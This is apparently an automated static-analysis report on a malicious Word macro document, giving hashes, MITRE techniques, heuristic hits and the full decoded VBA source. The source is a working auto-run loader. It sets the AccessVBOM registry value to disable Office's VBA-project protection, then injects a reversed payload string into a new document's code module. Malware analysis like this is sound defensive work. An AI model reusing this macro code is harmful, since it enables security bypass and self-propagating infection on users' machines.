Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 6c3a4552b6d679a3…

MALICIOUS

Office (OOXML) / .DOC

76.1 KB Created: 2021-05-07 10:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-29
MD5: eb14e223b564a4a5aaad059fc2f020c3 SHA-1: dd2ccd7f6fd6d0680ec17fdf98dbc645c7ee0cba SHA-256: 6c3a4552b6d679a3bbc97931c038fd796c251d8cdebd9a5d0fd3365d9f4b1ea2
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1137.001 DLL Search Order Hijacking

This OOXML document contains VBA macros that leverage WScript.Shell and CreateObject to manipulate the VBA project, specifically writing code into the 'ThisDocument' module. This behavior is indicative of malware attempting to achieve persistence or evade analysis by modifying its own code. The script also attempts to write a REG_DWORD value to a registry key, likely for persistence.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    With CreateObject("wscript.shell")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    .AddFromString repoProcGlobal
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set listCaptionDelete = CreateObject("word.application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1993 bytes
SHA-256: ab7f7f75acdbd390accd310877c7e37f284aecc88642d389f3aedae5829fcfaf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{AB37F725-3828-4FFE-8A7A-A9485F9DB883}{C2016D0D-85E6-4CB9-BB8B-433B964EE056}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "collectionTrustSize"
Sub autoopen()
screenCaptionValue
Dim removeTrustData As String
removeTrustData = listBufA
arraySwapLocal removeTrustData
End Sub

Attribute VB_Name = "storageRightData"
Sub arraySwapLocal(repoProcGlobal As String)
Set listCaptionDelete = CreateObject("word.application")
With listCaptionDelete.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule
.AddFromString repoProcGlobal
End With
listCaptionDelete.Visible = False
listCaptionDelete.Quit SaveChanges:=wdDoNotSaveChanges
End Sub

Attribute VB_Name = "storageVariable"
Function exceptionQueryNamespace() As String
exceptionQueryNamespace = Application.Version
End Function
Sub bufQuery()
With CreateObject("wscript.shell")
.RegWrite leftDataMem("indexStructDocument") & exceptionQueryNamespace & documentMemoryEx("variableArrayConvert"), 1, "REG_DWORD"
End With
End Sub
Function leftDataMem(varVar)
leftDataMem = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
End Function
Function documentMemoryEx(varVar)
documentMemoryEx = "\Word\Security\" & variableConstClass("trustLoadDelete")
End Function
Function variableConstClass(varVar)
variableConstClass = Replace("1BOM", "1", "AccessV")
End Function
Sub screenCaptionValue()
bufQuery
End Sub
Function listBufA()
listBufA = StrReverse(UserForm1.TextBox1)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 23552 bytes
SHA-256: 998a5cb43f792334b93360918f70ba949f02123428fa4fb5a1a1141374f3f486